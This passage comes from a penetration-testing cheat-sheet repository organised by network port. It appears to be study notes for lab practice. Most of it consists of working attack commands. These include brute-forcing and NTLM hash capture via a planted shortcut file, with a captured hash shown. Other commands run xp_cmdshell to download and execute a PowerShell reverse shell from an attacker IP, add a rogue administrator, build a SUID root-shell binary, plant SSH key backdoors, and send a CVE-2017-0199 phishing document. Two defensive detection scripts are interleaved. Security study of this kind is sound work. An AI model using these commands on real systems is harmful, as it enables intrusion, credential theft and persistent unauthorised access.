# List domains, computers, and resources shared 24 | net use K: \\\C # Connect to a computer from a shared resource 25 | ``` 26 | 27 | #### nmap 28 | 29 | ```bash 30 | sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n 31 | ``` 32 | -------------------------------------------------------------------------------- /pentesting-network/139-445-smb.md: -------------------------------------------------------------------------------- 1 | # 139,445 (SMB) 2 | 3 | ## Enumeration 4 | 5 | ### smbmap 6 | 7 | ```bash 8 | smbmap -H 9 | smbmap -H -u anonymous 10 | smbmap -H -u '' -p '' 11 | smbmap -H -u 'guest' -p '' 12 | smbmap -R -H # List out directories and their contents 13 | # Look for things like Groups.xml for AD 14 | smbmap -R -H -A Groups.xml -q # Attempt to download file 15 | # Locate cpasword= in Groups.xml and decrypt it 16 | gpp-decrypt 17 | ``` 18 | 19 | ### smbclient 20 | 21 | ```bash 22 | smbclient -L // # List out available shares 23 | smbclient -L /// -U 24 | smbclient /// # Connect to an available share 25 | 26 | # Forcing Protol NT1 27 | smbclient -L /// --option='client min protocol=NT1' 28 | smbclient /// --option='client min protocol=NT1' 29 | ``` 30 | 31 | #### Commands 32 | 33 | ```bash 34 | dir /a 35 | smb: \> mask "*" 36 | smb: \> recurse ON 37 | smb: \> prompt OFF 38 | smb: \> mget * 39 | ``` 40 | 41 | ### crackmapexec 42 | 43 | ```bash 44 | crackmapexec smb 45 | crackmapexec smb 'guest' -p '' 46 | crackmapexec smb --shares 47 | crackmapexec smb --shares -u '' -p '' 48 | crackmapexec smb --shares -u -p 49 | crackmapexec smb --pass-pol 50 | crackmapexec smb --pass-pol -u '' -p '' # Null authentication attempt 51 | crackmapexec smb --users 52 | crackmapexec smb -u 'a' -p '' --rid-brute # Enum users by bruteforcing RID 53 | crackmapexec smb -u -H # Look for Pwn3d! 54 | crackmapexec smb -u -p # SMB authentication/bruteforce 55 | 56 | crackmapexec winrm --shares -u -p # Tell us if we can get on the machine 57 | # Look for Pwn3d! 
58 | evil-winrm -i -u -p 59 | ``` 60 | 61 | ### rpcclient 62 | 63 | ```bash 64 | rpcclient 65 | rpcclient -U '' # Check for anonymous login 66 | rpcclient -U '' -N # Saying with no password 67 | > # Check for options 68 | > enumdomusers # List out usernames 69 | > queryuser 70 | > queryuser 71 | > queryusergroups 72 | > querydispinfo 73 | > enumdomgroups 74 | > querygroup 75 | > querygroupmem 76 | > lookupnames 77 | > lookupsids 78 | ``` 79 | 80 | After running `enumdomusers` and getting a list of users, pull out just the usernames by: 81 | 82 | ```bash 83 | cat users.txt | awk -F\[ '{print $2}' | awk -F\] '{print $1}' > newfile.txt 84 | ``` 85 | 86 | #### SIDs 87 | 88 | Brute force enumerating SIDs to identify other users 89 | 90 | ```bash 91 | # Bash one liner 92 | for i in {1000..1050}; do rpcclient -U '%' -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done 93 | # Python script (Impacket) 94 | lookupsid.py :@ 95 | ``` 96 | 97 | ### nbtscan 98 | 99 | ```bash 100 | nbtscan 101 | ``` 102 | 103 | ### enum4linux 104 | 105 | ```bash 106 | enum4linux 107 | ``` 108 | 109 | ### samrdump 110 | 111 | ```bash 112 | python3 /usr/share/doc/python3-impacket/examples/samrdump.py 113 | ``` 114 | 115 | ### nmap 116 | 117 | ```bash 118 | # /usr/share/nmap/scripts/smb* 119 | nmap -p445 --script=smb-system-info 120 | nmap -p445 --script=smb-enum* 121 | nmap -p445 --script=smb-vuln* 122 | ``` 123 | 124 | ### Metasploit 125 | 126 | ```bash 127 | search smb 128 | ``` 129 | 130 | ## Brute Force 131 | 132 | ```bash 133 | nmap --script smb-brute -p 445 134 | ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce eachusernam 135 | hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt smb -V -f 136 | hydra -L usernames.txt -P passwords.txt smb -V -f 137 | ``` 138 | 139 | ## Exploitation Check 140 | 141 | * [ ] Enumerate and download any interesting files ideally looking for credentials 
or other information relating to other services. 142 | * [ ] Can you login via SMB and put files on the system? 143 | * [ ] If so, is there a web interface where you can access the files? 144 | * [ ] If so, then you may be able to upload a reverse shell. 145 | * [ ] If so, can you use Metasploit to create symbolic link to the root filesystem? 146 | 147 | ## Exploitation 148 | 149 | ### Metasploit 150 | 151 | ```bash 152 | use auxiliary/admin/smb/samba_symlink_traversal 153 | set rhost 154 | set smbshare 155 | exploit 156 | ``` 157 | 158 | Then back in `smbclient` we can `cd` into the `rootfs` that was created. 159 | 160 | ### SMB Password Change 161 | 162 | ```bash 163 | # Attempt to change a users password through SMB 164 | smbpasswd -U -r 165 | # Then can use crackmapexec to test login 166 | cme smb -u -p 167 | cme winrm -u -p 168 | ``` 169 | 170 | ### SMB Drive Mapping 171 | 172 | ```bash 173 | sudo mount -t cifs -o 'user=,password=' //IP/Share /mnt/dir 174 | # Go into /mnt/dir to look for interesting files 175 | ``` 176 | 177 | ### URI File Attack 178 | 179 | If the target is a Windows host and the SMB Share can be written to, we can use the SMB share access to upload a file that the target system will interpret as a Windows shortcut. In this file, we can specify an icon that points to our Kali host. This should allows us to capture the user's NTLM hash when it is accessed. 
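The defender-side counterpart of the technique above: the planted shortcut is a plain text file sitting on the share, so a periodic scan of the share can find it before a user browses the folder. This is an added example, not code from these notes; it assumes the share is mounted as a local directory, that the names in `trusted_hosts` are the organisation's own file servers, and the `192.0.2.10` address and sample files are constructed.

```python
"""Added defender-side check: find Internet Shortcut (.url) files on a share
whose IconFile= points at a UNC host that is not a known file server.

Assumptions (mine, not the notes'): the share is reachable as a local directory
(e.g. after mount -t cifs) and trusted_hosts lists the organisation's own
file servers. 192.0.2.10 and the sample files below are constructed."""
import os
import re
import tempfile
from dataclasses import dataclass

# \\host\... or \\host ; the host is everything up to the next backslash
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)")


@dataclass
class Finding:
    path: str
    icon_file: str
    host: str


def shortcut_icon_file(text: str):
    """Return the IconFile= value from an [InternetShortcut] section, or None.

    A deliberately small INI reader: .url files are key=value lines under
    section headers; section and key names are matched case-insensitively."""
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "iconfile":
                return value.strip()
    return None


def remote_icon_host(icon_file: str, trusted_hosts):
    """Return the UNC host the icon would be fetched from if it is not trusted."""
    m = UNC_HOST_RE.match(icon_file)
    if not m:
        return None  # local path or URL: no SMB connection is triggered by the icon
    host = m.group(1).lower()
    return None if host in trusted_hosts else host


def decode_file(data: bytes) -> str:
    """Shortcut files written from Windows may be UTF-16; handle both BOMs."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")


def scan_share(root: str, trusted_hosts=(), max_bytes: int = 64 * 1024):
    """Walk a mounted share and report .url files whose icon lives on an untrusted host."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".url"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue  # real shortcut files are a few hundred bytes
                with open(path, "rb") as fh:
                    text = decode_file(fh.read())
            except OSError:
                continue
            icon = shortcut_icon_file(text)
            if icon is None:
                continue
            host = remote_icon_host(icon, trusted)
            if host is not None:
                findings.append(Finding(path, icon, host))
    return findings


# Constructed samples: one planted shortcut, one legitimate intranet shortcut.
PLANTED_URL = (
    "[InternetShortcut]\r\nURL=anything\r\nWorkingDirectory=anything\r\n"
    "IconFile=\\\\192.0.2.10\\%USERNAME%.icon\r\nIconIndex=1\r\n"
)
BENIGN_URL = (
    "[InternetShortcut]\r\nURL=http://intranet.example.test/\r\n"
    "IconFile=\\\\fileserver01\\icons\\intranet.ico\r\nIconIndex=0\r\n"
)


def demo():
    """Write the samples into a temporary 'share' and scan it."""
    with tempfile.TemporaryDirectory() as share:
        with open(os.path.join(share, "@hax.url"), "w", newline="") as fh:
            fh.write(PLANTED_URL)
        with open(os.path.join(share, "Intranet.url"), "w", newline="") as fh:
            fh.write(BENIGN_URL)
        return scan_share(share, trusted_hosts=["fileserver01"])


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: IconFile {f.icon_file!r} fetches from untrusted host {f.host}")
```

The file scan only catches what is already on the share; the same hash capture needs an outbound SMB connection from the victim, so blocking TCP 445 egress at the perimeter and alerting on NTLM authentication to hosts outside the file-server set covers the cases a scan misses.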
Create a file named @hax.url with the following contents:

{% code title="@hax.url" %}
```bash
[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\\%USERNAME%.icon
IconIndex=1
```
{% endcode %}

Start Responder to listen for the request:

```bash
sudo responder -I tap0 -v
```

Upload the file to the SMB share:

```bash
kali@kali:~/Documents/offsec/oscp/proving_grounds/Vault$ smbclient //192.168.71.172/DocumentsShare
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put @hax.url
putting file @hax.url as \@hax.url (0.4 kb/s) (average 0.4 kb/s)
```

Responder output:

{% code overflow="wrap" %}
```bash
[SMB] NTLMv2-SSP Client   : 192.168.71.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:a07bde1e074e8ce7:7E005501CA1DA9CF07F1685B766EDFF3:010100000000000000190681B8C7D801B6D4A008DAA2A3E00000000002000800450038004800570001001E00570049004E002D00480053003200380043005100560038004C005900440004003400570049004E002D00480053003200380043005100560038004C00590044002E0045003800480057002E004C004F00430041004C000300140045003800480057002E004C004F00430041004C000500140045003800480057002E004C004F00430041004C000700080000190681B8C7D801060004000200000008003000300000000000000001000000002000001B898DAC5A5D0D98431AE6A160F57301D980DD48CBD559755DCD4AF5BE07242D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00340039002E00370031000000000000000000
```
{% endcode %}

--------------------------------------------------------------------------------
/pentesting-network/1433-mssql.md:
--------------------------------------------------------------------------------

# 1433 (MSSQL)

## Enumeration

### Checks

* [ ] Try default credentials "sa:password"
* [ ] Brute force creds
* [ ] Check database content for new passwords
* [ ] Check version for exploits
* [ ] RCE
  * [ ] through xp\_cmdshell functionality
  * [ ] through injecting a payload into an output file, placing it in the webroot and triggering it through the webapp

### Connection

#### sqsh

```bash
sqsh -S -U sa
sqsh -S -U sa -P password
sqsh -S :27900 -U sa -P password
```

#### mssqlclient.py

```bash
mssqlclient.py -windows-auth /:@
mssqlclient.py :@

# Once logged in you can run queries:
SQL> select @@version;

# Steal NTLM hash
sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\\liodeus\' # Steal the NTLM hash, crack it with john or hashcat

# Try to enable code execution
SQL> enable_xp_cmdshell

# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http:///nc.exe
```

### nmap

```bash
nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' -oN 1433_nmap_mssql
# Credential brute force
nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433
```

### xp\_cmdshell

#### Enable

```bash
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
```

#### Commands

```bash
# Manual enumeration
xp_cmdshell 'whoami /all';
xp_cmdshell 'systeminfo';
xp_cmdshell 'net user'; # Potential for brute force or password re-use
xp_cmdshell 'reg query HKLM /f pass /t REG_SZ /s'; # Search registry for "pass"
xp_cmdshell 'findstr /si password *.txt *.ini *.config *.xml' # Check for plaintext passwords
# Run other PrivEsc commands for enumeration

# Download files for reverse shell
xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://192.168.119.165:9090/Invoke-PowerShellTcp.ps1')";--
xp_cmdshell "certutil -urlcache -f 'http://192.168.119.165:9090/nc.exe' nc.exe"

# Create user and pass then add them to the Admin group (needs enough permissions)
xp_cmdshell 'net user byte bytepass /add'
go
xp_cmdshell 'net localgroup Administrators byte /add'
go
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go
```

### Metasploit

```bash
use auxiliary/scanner/mssql/mssql_ping
```

## Brute Force

### Metasploit

```bash
scanner/mssql/mssql_login
```

### Hydra

```bash
hydra -l sa -P password.txt -V mssql
hydra -L -P mssql -vV -I -u
```

### Cheat sheet

[MSSQL injection cheat sheet](https://www.asafety.fr/mssql-injection-cheat-sheet/)

--------------------------------------------------------------------------------
/pentesting-network/161-snmp.md:
--------------------------------------------------------------------------------

# 161 (SNMP)

## Enumeration

### Checks

* [ ] Try the default community strings 'public' and 'private'
* [ ] Enumerate version of OS, users, and processes

### Useful OIDs

| OID                    | Description      |
| ---------------------- | ---------------- |
| 1.3.6.1.2.1.25.1.6.0   | System Processes |
| 1.3.6.1.2.1.25.4.2.1.2 | Running Programs |
| 1.3.6.1.2.1.25.4.2.1.4 | Process Path     |
| 1.3.6.1.2.1.25.2.3.1.4 | Storage Units    |
| 1.3.6.1.2.1.25.6.3.1.2 | Software Name    |
| 1.3.6.1.4.1.77.1.2.25  | User Accounts    |
| 1.3.6.1.2.1.6.13.1.3   | TCP Local Ports  |

### Commands

#### nmap

```bash
nmap -sU -p161 --script "snmp-*"
```

### Brute Force Community Strings

```bash
# Try 100+ community strings
onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
# Only try "public" and "private"
onesixtyone -i targets.list
```

#### snmpwalk

```bash
snmpwalk -c public -v1 192.168.1.101 # Community string and which version
# Enumerate Windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# Enumerate running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2
```

```bash
snmpwalk -v 2c -c public
snmpwalk -v 2c -c public hrSWInstalledName
snmpwalk -v 2c -c public hrMemorySize
snmpwalk -v 2c -c public sysContact # Get the sysContact variable, i.e. nikos
snmpset -v 2c -c public sysContact.0 s els # Change the sysContact variable to els
```

#### snmpbulkwalk

```bash
snmpbulkwalk -c -v
```

#### snmp-check

```bash
snmp-check
snmp-check -t -c public
```

### Enumerate Info with Known Community String

```bash
snmpwalk -c public -v1 192.168.1.101 # Community string and which version
# Enumerate Windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# Enumerate running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2
```

### Modifying SNMP Values

[Net-SNMP tutorial: snmpset](http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html)

--------------------------------------------------------------------------------
/pentesting-network/2049-nfs.md:
--------------------------------------------------------------------------------

# 2049 (NFS)

## Enumeration

### nmap Scripts

```bash
nmap -p 2049 --script=nfs*
nfs-ls # List NFS exports and check permissions
nfs-showmount # Like showmount -e
nfs-statfs # Disk statistics and info from NFS share
```

### Metasploit

Scan NFS mounts and list permissions.

```bash
scanner/nfs/nfsmount
```

### Check Shares

Check available folders:

```bash
showmount -e
cat /etc/exports # List exported shares
```

## Mounting

### Create Mount

```bash
# Syntax
mount -t nfs [-o vers=2] : -o nolock
# Example
mkdir /mnt/myroot
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/myroot -o nolock
# Unmount the mount
umount /mnt/myroot/
```

#### Using SSH

```bash
ssh-keygen # Generate key pair
mkdir /mnt/myroot
mount -t nfs :/ /mnt/myroot
cat .ssh/id_rsa.pub >> /mnt/myroot/root/.ssh/authorized_keys
umount /mnt/myroot/
```

### Example Exploit

#### From Attacker as root user

```bash
mkdir
mount -v -t nfs :
cd
# Headers are needed, otherwise current gcc rejects the implicit declarations
printf '#include <stdlib.h>\n#include <unistd.h>\nint main(void){setreuid(0,0); system("/bin/bash"); return 0;}\n' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn
```

#### From Target as Victim

```bash
cd
./pwn # Root shell
```

--------------------------------------------------------------------------------
/pentesting-network/21-ftp.md:
--------------------------------------------------------------------------------

# 21 (FTP)

## Enumeration

### Banner Grabbing

```bash
nc 21 # Grab headers
telnet -vn 21
openssl s_client -connect crossfit.htb:21 -starttls ftp # Get certificate if any
```

### Connections

#### Anonymous Login

* `anonymous:anonymous`
* `anonymous:`
* `guest:`
* `ftp:ftp`
* `admin:admin`

```bash
ftp
ftp -p # Passive mode login
>ls -a # List all files (even hidden) (yes, they could be hidden)
>dir /a
>passive # Set the mode to passive
>binary # Set transmission to binary instead of ascii
>ascii # Set transmission to ascii instead of binary
>bye # Exit
```

#### Downloading

```bash
PASSIVE
BINARY
get
mget * # Download all files
wget -m ftp://anonymous:anonymous@10.10.10.98 # Download all files
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all files
```

#### Uploading

```bash
PASSIVE
BINARY
put
```

### nmap Scripts

```bash
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21
nmap --script ftp-* -p 21
```

### Checks

* [ ] Check for anonymous access
* [ ] Check if you can upload a file to trigger a webshell through the webapp
* [ ] Check if you can download backup files to extract included passwords
* [ ] Check the version of FTP for exploits

## Brute Forcing

```bash
hydra -V -f -L -P ftp:// -u -vV
hydra -l root -P passwords.txt [-t 32] ftp
```

--------------------------------------------------------------------------------
/pentesting-network/22-ssh.md:
--------------------------------------------------------------------------------

# 22 (SSH)

## Enumeration

### Checks

* [ ] Try easy username-password combinations
* [ ] Check for username enumeration vulnerabilities
* [ ] Check version for vulnerabilities
* [ ] Attempt brute forcing
* [ ] Check for port knocking

### Banner Grabbing

```bash
nc 22
nc -vn 22
```

### Connections

#### SSH

```bash
ssh @
ssh @ -i id_rsa # Login via private key (chmod 600 the key file first)
```

#### SCP

```bash
scp @:/path/to/copy
```

#### SFTP

```bash
sftp
```

### nmap Scripts

```bash
nmap -p 22000 -sV -Pn -T4 --script=ssh*
```

### Restricted Shell Breakout

```bash
ssh joe@funbox -i joe_id_rsa -t "bash --noprofile"
ssh seppuku@192.168.53.90 -t "bash --noprofile"
```

### Account Login Error

```bash
# When getting a specific error where only SFTP works, try...
ssh -v @ id
ssh -v @ /bin/bash
```

### Port knocking

```bash
# If nmap comes back showing port 22 as filtered...
# We need to find /etc/knockd.conf (through LFI or FTP or something else)
# Inside there is a sequence
knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3
# Check nmap again
```

### Key Generation

```bash
# Attack machine
ssh-keygen
chmod 600
cat .pub
# Target
echo .pub >> /.ssh/authorized_keys
```

## Backdoor

```bash
# Attacker
ssh-keygen -f
chmod 600
cat .pub -> copy

# Victim
echo .pub >> /.ssh/authorized_keys

# Connect
ssh -i @
```

## Brute Force

```bash
hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 ssh
hydra -l -P passwords.txt -T 20 ssh
hydra -V -f -L -P ssh:// -u -vV
```

--------------------------------------------------------------------------------
/pentesting-network/23-telnet.md:
--------------------------------------------------------------------------------

# 23 (Telnet)

## Enumeration

### Banner Grabbing

```bash
nc -vn 23
```

### nmap Scripts

```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23
```

## Brute Force

```bash
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt telnet
hydra -l root -P passwords.txt [-t 32] telnet
```

--------------------------------------------------------------------------------
/pentesting-network/25-smtp.md:
--------------------------------------------------------------------------------

# 25 (SMTP)

## Enumeration

### Checks

* [ ] Check for user enumeration
* [ ] Check version for exploits

### Scripts

#### nmap

```bash
nmap -p25 --script smtp-commands
nmap --script smtp-enum-users
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25
```

### Manual

```bash
nc -nvv 25
VRFY root
```

```bash
telnet 25
HELO anydomain.com
MAIL FROM: BruceWayne@WayneCorp.com # Select email address to send from
250 OK
RCPT TO: # Specify email address to send to
250 OK # Verifies the user exists
RCPT TO:
550 Unknown User # Verifies the user does not exist
RCPT TO:
250 OK # Cannot actually verify, as it is a different domain
```

Look into sending a malicious document to have the recipient of the email open it and hopefully gain a reverse shell or have the malicious code executed.

#### Example

CVE-2017-0199 RTF file exploit using the Reel machine on Hack The Box.

```bash
# Generate malicious RTF file
python cve-2017-0199_toolkit.py -M gen -w test.rtf -u http://attacker/test.hta -t RTF -x 0
# Generate malicious HTA file using examples from Out-HTA.ps1
cd /opt/nishang/Client
pwsh  # Start up PowerShell on Kali
. ./Out-HTA.ps1  # Dot-source the script so the Out-HTA function is loaded into the session
Out-HTA -PayloadURL http://attacker/test.ps1  # Create new ps1 script file

mv winDef_webInstall.hta /path/to/www
cp ../CVE-2017-0199/test.rtf /path/to/www
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1
mv /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 test.ps1  # Add the Invoke-PowerShellTcp -Reverse call to the bottom of the script
python3 -m http.server 80
nc -lvnp 9001

sendemail -f test@megabank.com -t nico@megabank.com -u RTF -m "Please conver this" -a test.rtf -s 10.10.10.77
# Wait for reverse shell
```
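From the mail server's side, the RCPT TO probing shown in the Manual section above (and the wordlist walk that smtp-user-enum does further down) is loud: every probe of a non-existent user leaves a reject line in the mail log. This added example, not code from these notes, flags a client that collects 550 "User unknown" rejects for many different recipients in a short window; it assumes Postfix-style `smtpd` reject lines and the `192.0.2.7` / `198.51.100.4` client addresses and sample log are constructed.

```python
"""Detect SMTP recipient enumeration from mail-server reject logs.

Added example, not from the original notes. Assumes Postfix-style smtpd
reject lines; the sample lines below are constructed (documentation IP ranges)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Postfix: "... NOQUEUE: reject: RCPT from host[ip]: 550 5.1.1 <user@dom>:
#           Recipient address rejected: User unknown ... to=<user@dom> ..."
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: NOQUEUE: reject: "
    r"RCPT from \S+\[(?P<client>[0-9a-fA-F.:]+)\]: 550 .*?User unknown.*? to=<(?P<rcpt>[^>]+)>"
)


@dataclass
class Reject:
    ts: datetime
    client: str
    rcpt: str


@dataclass
class Alert:
    client: str
    distinct_rcpts: int
    first: datetime
    last: datetime


def parse_reject(line: str, year: int = 2016):
    """Return a Reject for a 'User unknown' RCPT reject line, else None.

    syslog timestamps carry no year, so one is assumed for the demo."""
    m = REJECT_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return Reject(ts, m.group("client"), m.group("rcpt").lower())


def detect_enumeration(lines, window_s: int = 300, min_distinct: int = 5):
    """Alert on any client rejected for >= min_distinct different recipients
    inside a sliding window of window_s seconds.

    A legitimate sender mistyping one address repeats the same recipient and
    never trips this; a wordlist walk produces a new recipient per probe."""
    per_client = defaultdict(list)
    for line in lines:
        rej = parse_reject(line)
        if rej:
            per_client[rej.client].append(rej)

    alerts = []
    for client, rejects in per_client.items():
        rejects.sort(key=lambda r: r.ts)
        start = 0
        for i, rej in enumerate(rejects):
            # Advance the window's left edge past events older than window_s
            while (rej.ts - rejects[start].ts).total_seconds() > window_s:
                start += 1
            distinct = {r.rcpt for r in rejects[start:i + 1]}
            if len(distinct) >= min_distinct:
                alerts.append(Alert(client, len(distinct), rejects[start].ts, rej.ts))
                break  # one alert per client is enough
    return alerts


def _line(ts: str, client: str, rcpt: str) -> str:
    """Build one constructed Postfix reject line."""
    return (f"{ts} mx postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[{client}]: "
            f"550 5.1.1 <{rcpt}>: Recipient address rejected: User unknown in local "
            f"recipient table; from=<test@example.com> to=<{rcpt}> proto=SMTP helo=<anydomain.com>")


# Constructed sample log: a wordlist walk from 192.0.2.7, plus one mistyped
# address retried twice from 198.51.100.4, plus an unrelated connect line.
SAMPLE_LOG = [
    _line("Jun 19 11:05:01", "192.0.2.7", "aaron@example.com"),
    _line("Jun 19 11:05:02", "192.0.2.7", "abby@example.com"),
    _line("Jun 19 11:05:02", "192.0.2.7", "abigail@example.com"),
    _line("Jun 19 11:05:03", "192.0.2.7", "adam@example.com"),
    _line("Jun 19 11:05:04", "192.0.2.7", "adrian@example.com"),
    _line("Jun 19 11:05:05", "192.0.2.7", "aidan@example.com"),
    "Jun 19 11:05:06 mx postfix/smtpd[2231]: connect from unknown[192.0.2.7]",
    _line("Jun 19 11:20:00", "198.51.100.4", "bill.smith@example.com"),
    _line("Jun 19 11:21:30", "198.51.100.4", "bill.smith@example.com"),
]


def run_demo():
    return detect_enumeration(SAMPLE_LOG)


if __name__ == "__main__":
    for a in run_demo():
        print(f"{a.client}: {a.distinct_rcpts} unknown recipients "
              f"between {a.first:%H:%M:%S} and {a.last:%H:%M:%S}")
```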
### Commands

```bash
HELO - 
EHLO - Extended SMTP.
STARTTLS - SMTP is communicated over an unencrypted protocol. By starting a TLS session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify whether the email user's mailbox exists.
```

### **smtp-user-enum**

```bash
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t
```

```bash
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /root/sectools/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 8607
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Sun Jun 19 11:04:59 2016 #########
192.168.1.103: Bin exists
192.168.1.103: Irc exists
192.168.1.103: Mail exists
192.168.1.103: Man exists
192.168.1.103: Sys exists
######## Scan completed at Sun Jun 19 11:06:51 2016 #########
5 results.

8607 queries in 112 seconds (76.8 queries / sec)
```

### Metasploit

```bash
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOSTS                                                                    yes       The target address range or CIDR identifier
   RPORT      25                                                             yes       The target port
   THREADS    1                                                              yes       The number of concurrent threads
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.
```

--------------------------------------------------------------------------------
/pentesting-network/27017-27018-27019-mongodb.md:
--------------------------------------------------------------------------------

# 27017, 27018, 27019 (MongoDB)

## Login

By default mongo does not require a password.\
**Admin** is a common mongo database.

```bash
mongo
mongo :
mongo :/
mongo -u -p ''
```

The nmap script _**mongodb-brute**_ will check if creds are needed.

```bash
nmap -n -sV --script mongodb-brute -p 27017
```

**Some MongoDB commands:**

```mongodb
help
show dbs
use <db>
show collections
db.<collection>.find()  // Dump the collection
db.<collection>.count()  // Number of records in the collection
db.current.find({"username":"admin"})  // Find the username admin in the current db
```
31 | 32 | ```mongodb 33 | use // Create and switch to new DB 34 | db.users.insertOne({name: 'jeremy'}) // Insert some data into the DB 35 | db.users.insertOne({name: 'jessamy', country: 'scotland'}) 36 | db.users.find() 37 | db.users.find().limit(1) // View the first record 38 | db.users.find({country: 'scotland'}) // Find records where the country as scotland 39 | db.users.find({country: {"$ne": 'scotland'}}) // Find records where country is not scotland 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /pentesting-network/3128-squid.md: -------------------------------------------------------------------------------- 1 | # 3128 (Squid) 2 | 3 | ## Enumeration 4 | 5 | #### curl 6 | 7 | ```bash 8 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189 9 | # After finding other open ports using spose: 10 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189:3306 11 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189:8080 12 | 13 | ``` 14 | 15 | #### spose 16 | 17 | [https://github.com/aancw/spose](https://github.com/aancw/spose) 18 | 19 | ```bash 20 | python3 spose.py --proxy http://192.168.76.189:3128 --target 192.168.76.189 21 | Using proxy address http://192.168.76.189:3128 22 | 192.168.76.189 3306 seems OPEN 23 | 192.168.76.189 8080 seems OPEN 24 | ``` 25 | 26 | #### nmap 27 | 28 | You can use `nmap` to try to do additional scanning with `proxychains` by updating the proxychains.conf file using the following at the bottom of the file: 29 | 30 | `socks5 192.168.76.189 3128` or `http 192.168.76.189 3129` 31 | 32 | ```bash 33 | proxychains sudo nmap -sT -n -p3306,8080 192.168.76.189 -Pn 34 | ``` 35 | 36 | #### Webpage 37 | 38 | If a webpage is found, you can update the proxy settings in your browser or FoxyProxy to be configured with the proxy URL and port and then navigate to the page: [http://192.168.76.189:3128](http://192.168.76.189:3128) 39 | 40 | 41 | 42 | 
--------------------------------------------------------------------------------
/pentesting-network/3306-mysql.md:
